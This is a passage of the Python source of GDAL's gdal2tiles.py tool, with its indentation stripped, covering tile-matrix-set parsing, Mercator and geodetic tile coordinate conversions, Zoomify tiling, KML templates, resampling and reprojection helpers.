from osgeo import osr
try:
from PIL import Image
import numpy
import osgeo.gdal_array as gdalarray
numpy_available = True
except ImportError:
# 'antialias' resampling is not available
numpy_available = False
__version__ = "$Id: gdal2tiles.py d712a530aa1b0dabf9717dd935996dd7b9fd8ced 2020-11-15 15:12:13 +0100 Even Rouault $"
resampling_list = (
'average', 'near', 'bilinear', 'cubic', 'cubicspline', 'lanczos',
'antialias', 'mode', 'max', 'min', 'med', 'q1', 'q3')
webviewer_list = ('all', 'google', 'openlayers', 'leaflet', 'mapml', 'none')
class UnsupportedTileMatrixSet(Exception):
pass
class TileMatrixSet(object):
def __init__(self):
self.identifier = None
self.srs = None
self.topleft_x = None
self.topleft_y = None
self.matrix_width = None # at zoom 0
self.matrix_height = None # at zoom 0
self.tile_size = None
self.resolution = None # at zoom 0
self.level_count = None
def GeorefCoordToTileCoord(self, x, y, z, overriden_tile_size):
res = self.resolution * self.tile_size / overriden_tile_size / (2**z)
tx = int((x - self.topleft_x) / (res * overriden_tile_size))
# In default mode, we use a bottom-y origin
ty = int((y - (self.topleft_y - self.matrix_height * self.tile_size * self.resolution)) / (res * overriden_tile_size))
return tx, ty
def ZoomForPixelSize(self, pixelSize, overriden_tile_size):
"Maximal scaledown zoom of the pyramid closest to the pixelSize."
for i in range(self.level_count):
res = self.resolution * self.tile_size / overriden_tile_size / (2**i)
if pixelSize > res:
return max(0, i - 1) # We don't want to scale up
return self.level_count - 1
def PixelsToMeters(self, px, py, zoom, overriden_tile_size):
"Converts pixel coordinates in given zoom level of pyramid to EPSG:3857"
res = self.resolution * self.tile_size / overriden_tile_size / (2**zoom)
mx = px * res + self.topleft_x
my = py * res + (self.topleft_y - self.matrix_height * self.tile_size * self.resolution)
return mx, my
def TileBounds(self, tx, ty, zoom, overriden_tile_size):
"Returns bounds of the given tile in georef coordinates"
minx, miny = self.PixelsToMeters(tx * overriden_tile_size, ty * overriden_tile_size, zoom, overriden_tile_size)
maxx, maxy = self.PixelsToMeters((tx + 1) * overriden_tile_size, (ty + 1) * overriden_tile_size, zoom, overriden_tile_size)
return (minx, miny, maxx, maxy)
@staticmethod
def parse(j):
assert 'identifier' in j
assert 'supportedCRS' in j
assert 'tileMatrix' in j
assert isinstance(j['tileMatrix'], list)
srs = osr.SpatialReference()
assert srs.SetFromUserInput(str(j['supportedCRS'])) == 0
swapaxis = srs.EPSGTreatsAsLatLong() or srs.EPSGTreatsAsNorthingEasting()
metersPerUnit = 1.0
if srs.IsProjected():
metersPerUnit = srs.GetLinearUnits()
elif srs.IsGeographic():
metersPerUnit = srs.GetSemiMajor() * math.pi / 180;
tms = TileMatrixSet()
tms.srs = srs
tms.identifier = str(j['identifier'])
for i, tileMatrix in enumerate(j['tileMatrix']):
assert 'topLeftCorner' in tileMatrix
assert isinstance(tileMatrix['topLeftCorner'], list)
topLeftCorner = tileMatrix['topLeftCorner']
assert len(topLeftCorner) == 2
assert 'scaleDenominator' in tileMatrix
assert 'tileWidth' in tileMatrix
assert 'tileHeight' in tileMatrix
topleft_x = topLeftCorner[0]
topleft_y = topLeftCorner[1]
tileWidth = tileMatrix['tileWidth']
tileHeight = tileMatrix['tileHeight']
if tileWidth != tileHeight:
raise UnsupportedTileMatrixSet('Only square tiles supported')
# Convention in OGC TileMatrixSet definition. See gcore/tilematrixset.cpp
resolution = tileMatrix['scaleDenominator'] * 0.28e-3 / metersPerUnit
if swapaxis:
topleft_x, topleft_y = topleft_y, topleft_x
if i == 0:
tms.topleft_x = topleft_x
tms.topleft_y = topleft_y
tms.resolution = resolution
tms.tile_size = tileWidth
assert 'matrixWidth' in tileMatrix
assert 'matrixHeight' in tileMatrix
tms.matrix_width = tileMatrix['matrixWidth']
tms.matrix_height = tileMatrix['matrixHeight']
else:
if topleft_x != tms.topleft_x or topleft_y != tms.topleft_y:
raise UnsupportedTileMatrixSet('All levels should have same origin')
if abs(tms.resolution / (1 << i) - resolution) > 1e-8 * resolution:
raise UnsupportedTileMatrixSet('Only resolutions varying as power-of-two supported')
if tileWidth != tms.tile_size:
raise UnsupportedTileMatrixSet('All levels should have same tile size')
tms.level_count = len(j['tileMatrix'])
return tms
tmsMap = {}
profile_list = ['mercator', 'geodetic', 'raster']
# Read additional tile matrix sets from GDAL data directory
filename = gdal.FindFile('gdal', 'tms_MapML_APSTILE.json')
if filename:
dirname = os.path.dirname(filename)
for tmsfilename in glob.glob(os.path.join(dirname, "tms_*.json")):
data = open(tmsfilename, 'rb').read()
try:
j = json.loads(data.decode('utf-8'))
except:
j = None
if j is None:
print('Cannot parse ' + tmsfilename)
continue
try:
tms = TileMatrixSet.parse(j)
except UnsupportedTileMatrixSet:
continue
except:
print('Cannot parse ' + tmsfilename)
continue
tmsMap[tms.identifier] = tms
profile_list.append(tms.identifier)
threadLocal = threading.local()
# =============================================================================
# =============================================================================
# =============================================================================
__doc__globalmaptiles = """
globalmaptiles.py
Global Map Tiles as defined in Tile Map Service (TMS) Profiles
==============================================================
Functions necessary for generation of global tiles used on the web.
It contains classes implementing coordinate conversions for:
- GlobalMercator (based on EPSG:3857)
for Google Maps, Yahoo Maps, Bing Maps compatible tiles
- GlobalGeodetic (based on EPSG:4326)
for OpenLayers Base Map and Google Earth compatible tiles
More info at:
http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification
http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation
http://msdn.microsoft.com/en-us/library/bb259689.aspx
http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates
Created by Klokan Petr Pridal on 2008-07-03.
Google Summer of Code 2008, project GDAL2Tiles for OSGEO.
In case you use this class in your product, translate it to another language
or find it useful for your project please let me know.
My email: klokan at klokan dot cz.
I would like to know where it was used.
Class is available under the open-source GDAL license (www.gdal.org).
"""
MAXZOOMLEVEL = 32
class GlobalMercator(object):
r"""
TMS Global Mercator Profile
---------------------------
Functions necessary for generation of tiles in Spherical Mercator projection,
EPSG:3857.
Such tiles are compatible with Google Maps, Bing Maps, Yahoo Maps,
UK Ordnance Survey OpenSpace API, ...
and you can overlay them on top of base maps of those web mapping applications.
Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left).
What coordinate conversions do we need for TMS Global Mercator tiles::
LatLon <-> Meters <-> Pixels <-> Tile
WGS84 coordinates Spherical Mercator Pixels in pyramid Tiles in pyramid
lat/lon XY in meters XY pixels Z zoom XYZ from TMS
EPSG:4326 EPSG:387
.----. --------- -- TMS
/ \ <-> | | <-> /----/ <-> Google
\ / | | /--------/ QuadTree
----- --------- /------------/
KML, public WebMapService Web Clients TileMapService
What is the coordinate extent of Earth in EPSG:3857?
[-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244]
Constant 20037508.342789244 comes from the circumference of the Earth in meters,
which is 40 thousand kilometers, the coordinate origin is in the middle of extent.
In fact you can calculate the constant as: 2 * math.pi * 6378137 / 2.0
$ echo 180 85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:3857
Polar areas with abs(latitude) bigger then 85.05112878 are clipped off.
What are zoom level constants (pixels/meter) for pyramid with EPSG:3857?
whole region is on top of pyramid (zoom=0) covered by 256x256 pixels tile,
every lower zoom level resolution is always divided by two
initialResolution = 20037508.342789244 * 2 / 256 = 156543.03392804062
What is the difference between TMS and Google Maps/QuadTree tile name convention?
The tile raster itself is the same (equal extent, projection, pixel size),
there is just different identification of the same raster tile.
Tiles in TMS are counted from [0,0] in the bottom-left corner, id is XYZ.
Google placed the origin [0,0] to the top-left corner, reference is XYZ.
Microsoft is referencing tiles by a QuadTree name, defined on the website:
http://msdn2.microsoft.com/en-us/library/bb259689.aspx
The lat/lon coordinates are using WGS84 datum, yes?
Yes, all lat/lon we are mentioning should use WGS84 Geodetic Datum.
Well, the web clients like Google Maps are projecting those coordinates by
Spherical Mercator, so in fact lat/lon coordinates on sphere are treated as if
the were on the WGS84 ellipsoid.
From MSDN documentation:
To simplify the calculations, we use the spherical form of projection, not
the ellipsoidal form. Since the projection is used only for map display,
and not for displaying numeric coordinates, we don't need the extra precision
of an ellipsoidal projection. The spherical projection causes approximately
0.33 percent scale distortion in the Y direction, which is not visually
noticeable.
How do I create a raster in EPSG:3857 and convert coordinates with PROJ.4?
You can use standard GIS tools like gdalwarp, cs2cs or gdaltransform.
All of the tools supports -t_srs 'epsg:3857'.
For other GIS programs check the exact definition of the projection:
More info at http://spatialreference.org/ref/user/google-projection/
The same projection is designated as EPSG:3857. WKT definition is in the
official EPSG database.
Proj4 Text:
+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0
+k=1.0 +units=m +nadgrids=@null +no_defs
Human readable WKT format of EPSG:3857:
PROJCS["Google Maps Global Mercator",
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0],
UNIT["degree",0.0174532925199433],
AUTHORITY["EPSG","4326"]],
PROJECTION["Mercator_1SP"],
PARAMETER["central_meridian",0],
PARAMETER["scale_factor",1],
PARAMETER["false_easting",0],
PARAMETER["false_northing",0],
UNIT["metre",1,
AUTHORITY["EPSG","9001"]]]
"""
def __init__(self, tile_size=256):
"Initialize the TMS Global Mercator pyramid"
self.tile_size = tile_size
self.initialResolution = 2 * math.pi * 6378137 / self.tile_size
# 156543.03392804062 for tile_size 256 pixels
self.originShift = 2 * math.pi * 6378137 / 2.0
# 20037508.342789244
def LatLonToMeters(self, lat, lon):
"Converts given lat/lon in WGS84 Datum to XY in Spherical Mercator EPSG:3857"
mx = lon * self.originShift / 180.0
my = math.log(math.tan((90 + lat) * math.pi / 360.0)) / (math.pi / 180.0)
my = my * self.originShift / 180.0
return mx, my
def MetersToLatLon(self, mx, my):
"Converts XY point from Spherical Mercator EPSG:3857 to lat/lon in WGS84 Datum"
lon = (mx / self.originShift) * 180.0
lat = (my / self.originShift) * 180.0
lat = 180 / math.pi * (2 * math.atan(math.exp(lat * math.pi / 180.0)) - math.pi / 2.0)
return lat, lon
def PixelsToMeters(self, px, py, zoom):
"Converts pixel coordinates in given zoom level of pyramid to EPSG:3857"
res = self.Resolution(zoom)
mx = px * res - self.originShift
my = py * res - self.originShift
return mx, my
def MetersToPixels(self, mx, my, zoom):
"Converts EPSG:3857 to pyramid pixel coordinates in given zoom level"
res = self.Resolution(zoom)
px = (mx + self.originShift) / res
py = (my + self.originShift) / res
return px, py
def PixelsToTile(self, px, py):
"Returns a tile covering region in given pixel coordinates"
tx = int(math.ceil(px / float(self.tile_size)) - 1)
ty = int(math.ceil(py / float(self.tile_size)) - 1)
return tx, ty
def PixelsToRaster(self, px, py, zoom):
"Move the origin of pixel coordinates to top-left corner"
mapSize = self.tile_size << zoom
return px, mapSize - py
def MetersToTile(self, mx, my, zoom):
"Returns tile for given mercator coordinates"
px, py = self.MetersToPixels(mx, my, zoom)
return self.PixelsToTile(px, py)
def TileBounds(self, tx, ty, zoom):
"Returns bounds of the given tile in EPSG:3857 coordinates"
minx, miny = self.PixelsToMeters(tx * self.tile_size, ty * self.tile_size, zoom)
maxx, maxy = self.PixelsToMeters((tx + 1) * self.tile_size, (ty + 1) * self.tile_size, zoom)
return (minx, miny, maxx, maxy)
def TileLatLonBounds(self, tx, ty, zoom):
"Returns bounds of the given tile in latitude/longitude using WGS84 datum"
bounds = self.TileBounds(tx, ty, zoom)
minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1])
maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3])
return (minLat, minLon, maxLat, maxLon)
def Resolution(self, zoom):
"Resolution (meters/pixel) for given zoom level (measured at Equator)"
# return (2 * math.pi * 6378137) / (self.tile_size * 2**zoom)
return self.initialResolution / (2**zoom)
def ZoomForPixelSize(self, pixelSize):
"Maximal scaledown zoom of the pyramid closest to the pixelSize."
for i in range(MAXZOOMLEVEL):
if pixelSize > self.Resolution(i):
return max(0, i - 1) # We don't want to scale up
return MAXZOOMLEVEL - 1
def GoogleTile(self, tx, ty, zoom):
"Converts TMS tile coordinates to Google Tile coordinates"
# coordinate origin is moved from bottom-left to top-left corner of the extent
return tx, (2**zoom - 1) - ty
def QuadTree(self, tx, ty, zoom):
"Converts TMS tile coordinates to Microsoft QuadTree"
quadKey = ""
ty = (2**zoom - 1) - ty
for i in range(zoom, 0, -1):
digit = 0
mask = 1 << (i - 1)
if (tx & mask) != 0:
digit += 1
if (ty & mask) != 0:
digit += 2
quadKey += str(digit)
return quadKey
class GlobalGeodetic(object):
r"""
TMS Global Geodetic Profile
---------------------------
Functions necessary for generation of global tiles in Plate Carre projection,
EPSG:4326, "unprojected profile".
Such tiles are compatible with Google Earth (as any other EPSG:4326 rasters)
and you can overlay the tiles on top of OpenLayers base map.
Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left).
What coordinate conversions do we need for TMS Global Geodetic tiles?
Global Geodetic tiles are using geodetic coordinates (latitude,longitude)
directly as planar coordinates XY (it is also called Unprojected or Plate
Carre). We need only scaling to pixel pyramid and cutting to tiles.
Pyramid has on top level two tiles, so it is not square but rectangle.
Area [-180,-90,180,90] is scaled to 512x256 pixels.
TMS has coordinate origin (for pixels and tiles) in bottom-left corner.
Rasters are in EPSG:4326 and therefore are compatible with Google Earth.
LatLon <-> Pixels <-> Tiles
WGS84 coordinates Pixels in pyramid Tiles in pyramid
lat/lon XY pixels Z zoom XYZ from TMS
EPSG:4326
.----. ----
/ \ <-> /--------/ <-> TMS
\ / /--------------/
----- /--------------------/
WMS, KML Web Clients, Google Earth TileMapService
"""
def __init__(self, tmscompatible, tile_size=256):
self.tile_size = tile_size
if tmscompatible is not None:
# Defaults the resolution factor to 0.703125 (2 tiles @ level 0)
# Adhers to OSGeo TMS spec
# http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification#global-geodetic
self.resFact = 180.0 / self.tile_size
else:
# Defaults the resolution factor to 1.40625 (1 tile @ level 0)
# Adheres OpenLayers, MapProxy, etc default resolution for WMTS
self.resFact = 360.0 / self.tile_size
def LonLatToPixels(self, lon, lat, zoom):
"Converts lon/lat to pixel coordinates in given zoom of the EPSG:4326 pyramid"
res = self.resFact / 2**zoom
px = (180 + lon) / res
py = (90 + lat) / res
return px, py
def PixelsToTile(self, px, py):
"Returns coordinates of the tile covering region in pixel coordinates"
tx = int(math.ceil(px / float(self.tile_size)) - 1)
ty = int(math.ceil(py / float(self.tile_size)) - 1)
return tx, ty
def LonLatToTile(self, lon, lat, zoom):
"Returns the tile for zoom which covers given lon/lat coordinates"
px, py = self.LonLatToPixels(lon, lat, zoom)
return self.PixelsToTile(px, py)
def Resolution(self, zoom):
"Resolution (arc/pixel) for given zoom level (measured at Equator)"
return self.resFact / 2**zoom
def ZoomForPixelSize(self, pixelSize):
"Maximal scaledown zoom of the pyramid closest to the pixelSize."
for i in range(MAXZOOMLEVEL):
if pixelSize > self.Resolution(i):
return max(0, i - 1) # We don't want to scale up
return MAXZOOMLEVEL - 1
def TileBounds(self, tx, ty, zoom):
"Returns bounds of the given tile"
res = self.resFact / 2**zoom
return (
tx * self.tile_size * res - 180,
ty * self.tile_size * res - 90,
(tx + 1) * self.tile_size * res - 180,
(ty + 1) * self.tile_size * res - 90
)
def TileLatLonBounds(self, tx, ty, zoom):
"Returns bounds of the given tile in the SWNE form"
b = self.TileBounds(tx, ty, zoom)
return (b[1], b[0], b[3], b[2])
class Zoomify(object):
"""
Tiles compatible with the Zoomify viewer
----------------------------------------
"""
def __init__(self, width, height, tile_size=256, tileformat='jpg'):
"""Initialization of the Zoomify tile tree"""
self.tile_size = tile_size
self.tileformat = tileformat
imagesize = (width, height)
tiles = (math.ceil(width / tile_size), math.ceil(height / tile_size))
# Size (in tiles) for each tier of pyramid.
self.tierSizeInTiles = []
self.tierSizeInTiles.append(tiles)
# Image size in pixels for each pyramid tierself
self.tierImageSize = []
self.tierImageSize.append(imagesize)
while (imagesize[0] > tile_size or imagesize[1] > tile_size):
imagesize = (math.floor(imagesize[0] / 2), math.floor(imagesize[1] / 2))
tiles = (math.ceil(imagesize[0] / tile_size), math.ceil(imagesize[1] / tile_size))
self.tierSizeInTiles.append(tiles)
self.tierImageSize.append(imagesize)
self.tierSizeInTiles.reverse()
self.tierImageSize.reverse()
# Depth of the Zoomify pyramid, number of tiers (zoom levels)
self.numberOfTiers = len(self.tierSizeInTiles)
# Number of tiles up to the given tier of pyramid.
self.tileCountUpToTier = []
self.tileCountUpToTier[0] = 0
for i in range(1, self.numberOfTiers + 1):
self.tileCountUpToTier.append(
self.tierSizeInTiles[i - 1][0] * self.tierSizeInTiles[i - 1][1] +
self.tileCountUpToTier[i - 1]
)
def tilefilename(self, x, y, z):
"""Returns filename for tile with given coordinates"""
tileIndex = x + y * self.tierSizeInTiles[z][0] + self.tileCountUpToTier[z]
return os.path.join("TileGroup%.0f" % math.floor(tileIndex / 256),
"%s-%s-%s.%s" % (z, x, y, self.tileformat))
class GDALError(Exception):
pass
def exit_with_error(message, details=""):
# Message printing and exit code kept from the way it worked using the OptionParser (in case
# someone parses the error output)
sys.stderr.write("Usage: gdal2tiles.py [options] input_file [output]\n\n")
sys.stderr.write("gdal2tiles.py: error: %s\n" % message)
if details:
sys.stderr.write("\n\n%s\n" % details)
sys.exit(2)
def set_cache_max(cache_in_bytes):
# We set the maximum using `SetCacheMax` and `GDAL_CACHEMAX` to support both fork and spawn as multiprocessing start methods.
# https://github.com/OSGeo/gdal/pull/2112
os.environ['GDAL_CACHEMAX'] = '%d' % int(cache_in_bytes / 1024 / 1024)
gdal.SetCacheMax(cache_in_bytes)
def generate_kml(tx, ty, tz, tileext, tile_size, tileswne, options, children=None, **args):
"""
Template for the KML. Returns filled string.
"""
if not children:
children = []
args['tx'], args['ty'], args['tz'] = tx, ty, tz
args['tileformat'] = tileext
if 'tile_size' not in args:
args['tile_size'] = tile_size
if 'minlodpixels' not in args:
args['minlodpixels'] = int(args['tile_size'] / 2)
if 'maxlodpixels' not in args:
args['maxlodpixels'] = int(args['tile_size'] * 8)
if children == []:
args['maxlodpixels'] = -1
if tx is None:
tilekml = False
args['title'] = options.title
else:
tilekml = True
args['realtiley'] = GDAL2Tiles.getYTile(ty, tz, options)
args['title'] = "%d/%d/%d.kml" % (tz, tx, args['realtiley'])
args['south'], args['west'], args['north'], args['east'] = tileswne(tx, ty, tz)
if tx == 0:
args['drawOrder'] = 2 * tz + 1
elif tx is not None:
args['drawOrder'] = 2 * tz
else:
args['drawOrder'] = 0
url = options.url
if not url:
if tilekml:
url = "../../"
else:
url = ""
s = """<?xml version="1.0" encoding="utf-8"?>
<kml xmlns="http://www.opengis.net/kml/2.2">
<Document>
<name>%(title)s</name>
<description></description>
<Style>
<ListStyle id="hideChildren">
<listItemType>checkHideChildren</listItemType>
</ListStyle>
</Style>""" % args
if tilekml:
s += """
<Region>
<LatLonAltBox>
<north>%(north).14f</north>
<south>%(south).14f</south>
<east>%(east).14f</east>
<west>%(west).14f</west>
</LatLonAltBox>
<Lod>
<minLodPixels>%(minlodpixels)d</minLodPixels>
<maxLodPixels>%(maxlodpixels)d</maxLodPixels>
</Lod>
</Region>
<GroundOverlay>
<drawOrder>%(drawOrder)d</drawOrder>
<Icon>
<href>%(realtiley)d.%(tileformat)s</href>
</Icon>
<LatLonBox>
<north>%(north).14f</north>
<south>%(south).14f</south>
<east>%(east).14f</east>
<west>%(west).14f</west>
</LatLonBox>
</GroundOverlay>
""" % args
for cx, cy, cz in children:
csouth, cwest, cnorth, ceast = tileswne(cx, cy, cz)
ytile = GDAL2Tiles.getYTile(cy, cz, options)
s += """
<NetworkLink>
<name>%d/%d/%d.%s</name>
<Region>
<LatLonAltBox>
<north>%.14f</north>
<south>%.14f</south>
<east>%.14f</east>
<west>%.14f</west>
</LatLonAltBox>
<Lod>
<minLodPixels>%d</minLodPixels>
<maxLodPixels>-1</maxLodPixels>
</Lod>
</Region>
<Link>
<href>%s%d/%d/%d.kml</href>
<viewRefreshMode>onRegion</viewRefreshMode>
<viewFormat/>
</Link>
</NetworkLink>
""" % (cz, cx, ytile, args['tileformat'], cnorth, csouth, ceast, cwest,
args['minlodpixels'], url, cz, cx, ytile)
s += """ </Document>
</kml>
"""
return s
def scale_query_to_tile(dsquery, dstile, tiledriver, options, tilefilename=''):
"""Scales down query dataset to the tile dataset"""
querysize = dsquery.RasterXSize
tile_size = dstile.RasterXSize
tilebands = dstile.RasterCount
if options.resampling == 'average':
# Function: gdal.RegenerateOverview()
for i in range(1, tilebands + 1):
# Black border around NODATA
res = gdal.RegenerateOverview(dsquery.GetRasterBand(i), dstile.GetRasterBand(i),
'average')
if res != 0:
exit_with_error("RegenerateOverview() failed on %s, error %d" % (
tilefilename, res))
elif options.resampling == 'antialias' and numpy_available:
# Scaling by PIL (Python Imaging Library) - improved Lanczos
array = numpy.zeros((querysize, querysize, tilebands), numpy.uint8)
for i in range(tilebands):
array[:, :, i] = gdalarray.BandReadAsArray(dsquery.GetRasterBand(i + 1),
0, 0, querysize, querysize)
im = Image.fromarray(array, 'RGBA') # Always four bands
im1 = im.resize((tile_size, tile_size), Image.ANTIALIAS)
if os.path.exists(tilefilename):
im0 = Image.open(tilefilename)
im1 = Image.composite(im1, im0, im1)
im1.save(tilefilename, tiledriver)
else:
if options.resampling == 'near':
gdal_resampling = gdal.GRA_NearestNeighbour
elif options.resampling == 'bilinear':
gdal_resampling = gdal.GRA_Bilinear
elif options.resampling == 'cubic':
gdal_resampling = gdal.GRA_Cubic
elif options.resampling == 'cubicspline':
gdal_resampling = gdal.GRA_CubicSpline
elif options.resampling == 'lanczos':
gdal_resampling = gdal.GRA_Lanczos
elif options.resampling == 'mode':
gdal_resampling = gdal.GRA_Mode
elif options.resampling == 'max':
gdal_resampling = gdal.GRA_Max
elif options.resampling == 'min':
gdal_resampling = gdal.GRA_Min
elif options.resampling == 'med':
gdal_resampling = gdal.GRA_Med
elif options.resampling == 'q1':
gdal_resampling = gdal.GRA_Q1
elif options.resampling == 'q3':
gdal_resampling = gdal.GRA_Q3
# Other algorithms are implemented by gdal.ReprojectImage().
dsquery.SetGeoTransform((0.0, tile_size / float(querysize), 0.0, 0.0, 0.0,
tile_size / float(querysize)))
dstile.SetGeoTransform((0.0, 1.0, 0.0, 0.0, 0.0, 1.0))
res = gdal.ReprojectImage(dsquery, dstile, None, None, gdal_resampling)
if res != 0:
exit_with_error("ReprojectImage() failed on %s, error %d" % (tilefilename, res))
def setup_no_data_values(input_dataset, options):
"""
Extract the NODATA values from the dataset or use the passed arguments as override if any
"""
in_nodata = []
if options.srcnodata:
nds = list(map(float, options.srcnodata.split(',')))
if len(nds) < input_dataset.RasterCount:
in_nodata = (nds * input_dataset.RasterCount)[:input_dataset.RasterCount]
else:
in_nodata = nds
else:
for i in range(1, input_dataset.RasterCount + 1):
band = input_dataset.GetRasterBand(i)
raster_no_data = band.GetNoDataValue()
if raster_no_data is not None:
# Ignore nodata values that are not in the range of the band data type (see https://github.com/OSGeo/gdal/pull/2299)
if band.DataType == gdal.GDT_Byte and (raster_no_data != int(raster_no_data) or raster_no_data < 0 or raster_no_data > 255):
# We should possibly do similar check for other data types
in_nodata = []
break
in_nodata.append(raster_no_data)
if options.verbose:
print("NODATA: %s" % in_nodata)
return in_nodata
def setup_input_srs(input_dataset, options):
"""
Determines and returns the Input Spatial Reference System (SRS) as an osr object and as a
WKT representation
Uses in priority the one passed in the command line arguments. If None, tries to extract them
from the input dataset
"""
input_srs = None
input_srs_wkt = None
if options.s_srs:
input_srs = osr.SpatialReference()
input_srs.SetFromUserInput(options.s_srs)
input_srs_wkt = input_srs.ExportToWkt()
else:
input_srs_wkt = input_dataset.GetProjection()
if not input_srs_wkt and input_dataset.GetGCPCount() != 0:
input_srs_wkt = input_dataset.GetGCPProjection()
if input_srs_wkt:
input_srs = osr.SpatialReference()
input_srs.ImportFromWkt(input_srs_wkt)
if input_srs is not None:
input_srs.SetAxisMappingStrategy(osr.OAMS_TRADITIONAL_GIS_ORDER)
return input_srs, input_srs_wkt
def setup_output_srs(input_srs, options):
"""
Setup the desired SRS (based on options)
"""
output_srs = osr.SpatialReference()
if options.profile == 'mercator':
output_srs.ImportFromEPSG(3857)
elif options.profile == 'geodetic':
output_srs.ImportFromEPSG(4326)
elif options.profile == 'raster':
output_srs = input_srs
else:
output_srs = tmsMap[options.profile].srs.Clone()
if output_srs:
output_srs.SetAxisMappingStrategy(osr.OAMS_TRADITIONAL_GIS_ORDER)
return output_srs
def has_georeference(dataset):
return (dataset.GetGeoTransform() != (0.0, 1.0, 0.0, 0.0, 0.0, 1.0) or
dataset.GetGCPCount() != 0)
def reproject_dataset(from_dataset, from_srs, to_srs, options=None):
"""
Returns the input dataset in the expected "destination" SRS.
If the dataset is already in the correct SRS, returns it unmodified
"""
if not from_srs or not to_srs:
raise GDALError("from and to SRS must be defined to reproject the dataset")
if (from_srs.ExportToProj4() != to_srs.ExportToProj4()) or (from_dataset.GetGCPCount() != 0):
if from_srs.IsGeographic() and to_srs.GetAuthorityName(None) == 'EPSG' and to_srs.GetAuthorityCode(None) == '3857':
from_gt = from_dataset.GetGeoTransform(can_return_null=True)
if from_gt and from_gt[2] == 0 and from_gt[4] == 0 and from_gt[5] < 0:
maxlat = from_gt[3]
minlat = from_gt[3] + from_dataset.RasterYSize * from_gt[5]
MAX_LAT = 85.0511287798066
adjustBounds = False
if maxlat > MAX_LAT:
maxlat = MAX_LAT
adjustBounds = True
if minlat < -MAX_LAT:
minlat = -MAX_LAT
adjustBounds = True
if adjustBounds:
ct = osr.CoordinateTransformation(from_srs, to_srs)
west, south = ct.TransformPoint(from_gt[0], minlat)[:2]
east, north = ct.TransformPoint(from_gt[0] + from_dataset.RasterXSize * from_gt[1], maxlat)[:2]
return gdal.Warp("", from_dataset, format='VRT', outputBounds = [west, south, east, north], dstSRS = 'EPSG:3857')
to_dataset = gdal.AutoCreateWarpedVRT(from_dataset,
from_srs.ExportToWkt(), to_srs.ExportToWkt())
if options and options.verbose:
print("Warping of the raster by AutoCreateWarpedVRT (result saved into 'tiles.vrt')")
to_dataset.GetDriver().CreateCopy("tiles.vrt", to_dataset)
return to_dataset
else:
return from_dataset
def add_gdal_warp_options_to_string(vrt_string, warp_options):
if not warp_options:
return vrt_string
vrt_root = ElementTree.fromstring(vrt_string)
options = vrt_root.find("GDALWarpOptions")
if options is None:
return vrt_string
for key, value in warp_options.items():
tb = ElementTree.TreeBuilder()
tb.start("Option", {"name": key})
tb.data(value)
tb.end("Option")
elem = tb.close()
options.insert(0, elem)
return ElementTree.tostring(vrt_root).decode()
def update_no_data_values(warped_vrt_dataset, nodata_values, options=None):
"""
Takes an array of NODATA values and forces them on the WarpedVRT file dataset passed
"""
# TODO: gbataille - Seems that I forgot tests there
assert nodata_values != []
vrt_string = warped_vrt_dataset.GetMetadata("xml:VRT")[0]
vrt_string = add_gdal_warp_options_to_string(
vrt_string, {"INIT_DEST": "NO_DATA", "UNIFIED_SRC_NODATA": "YES"})
# TODO: gbataille - check the need for this replacement. Seems to work without
# # replace BandMapping tag for NODATA bands....
# for i in range(len(nodata_values)):
# s = s.replace(
# '<BandMapping src="%i" dst="%i"/>' % ((i+1), (i+1)),
# """
# <BandMapping src="%i" dst="%i">
# <SrcNoDataReal>%i</SrcNoDataReal>
# <SrcNoDataImag>0</SrcNoDataImag>
# <DstNoDataReal>%i</DstNoDataReal>
# <DstNoDataImag>0</DstNoDataImag>
# </BandMapping>
# """ % ((i+1), (i+1), nodata_values[i], nodata_values[i]))
corrected_dataset = gdal.Open(vrt_string)
# set NODATA_VALUE metadata
corrected_dataset.SetMetadataItem(
'NODATA_VALUES', ' '.join([str(i) for i in nodata_values]))
if options and options.verbose:
print("Modified warping result saved into 'tiles1.vrt'")
with open("tiles1.vrt", "w") as f:
f.write(corrected_dataset.GetMetadata("xml:VRT")[0])
return corrected_dataset
def add_alpha_band_to_string_vrt(vrt_string):
# TODO: gbataille - Old code speak of this being equivalent to gdalwarp -dstalpha
# To be checked
vrt_root = ElementTree.fromstring(vrt_string)
index = 0
nb_bands = 0
for subelem in list(vrt_root):
if subelem.tag == "VRTRasterBand":
nb_bands += 1
color_node = subelem.find("./ColorInterp")
if color_node is not None and color_node.text == "Alpha":
raise Exception("Alpha band already present")
else:
if nb_bands:
# This means that we are one element after the Band definitions
break
index += 1
tb = ElementTree.TreeBuilder()
tb.start("VRTRasterBand",
{'dataType': "Byte", "band": str(nb_bands + 1), "subClass": "VRTWarpedRasterBand"})
tb.start("ColorInterp", {})
tb.data("Alpha")
tb.end("ColorInterp")
tb.end("VRTRasterBand")
elem = tb.close()
vrt_root.insert(index, elem)
warp_options = vrt_root.find(".//GDALWarpOptions")
tb = ElementTree.TreeBuilder()
tb.start("DstAlphaBand", {})
tb.data(str(nb_bands + 1))
tb.end("DstAlphaBand")
elem = tb.close()
warp_options.append(elem)
# TODO: gbataille - this is a GDALWarpOptions. Why put it in a specific place?
tb = ElementTree.TreeBuilder()
tb.start("Option", {"name": "INIT_DEST"})
tb.data("0")
tb.end("Option")
elem = tb.close()
warp_options.append(elem)
return ElementTree.tostring(vrt_root).decode()
def update_alpha_value_for_non_alpha_inputs(warped_vrt_dataset, options=None):
"""
Handles dataset with 1 or 3 bands, i.e. without alpha channel, in the case the nodata value has
not been forced by options
"""
if warped_vrt_dataset.RasterCount in [1, 3]:
vrt_string = warped_vrt_dataset.GetMetadata("xml:VRT")[0]
vrt_string = add_alpha_band_to_string_vrt(vrt_string)
warped_vrt_dataset = gdal.Open(vrt_string)
if options and options.verbose:
print("Modified -dstalpha warping result saved into 'tiles1.vrt'")
with open("tiles1.vrt", "w") as f:
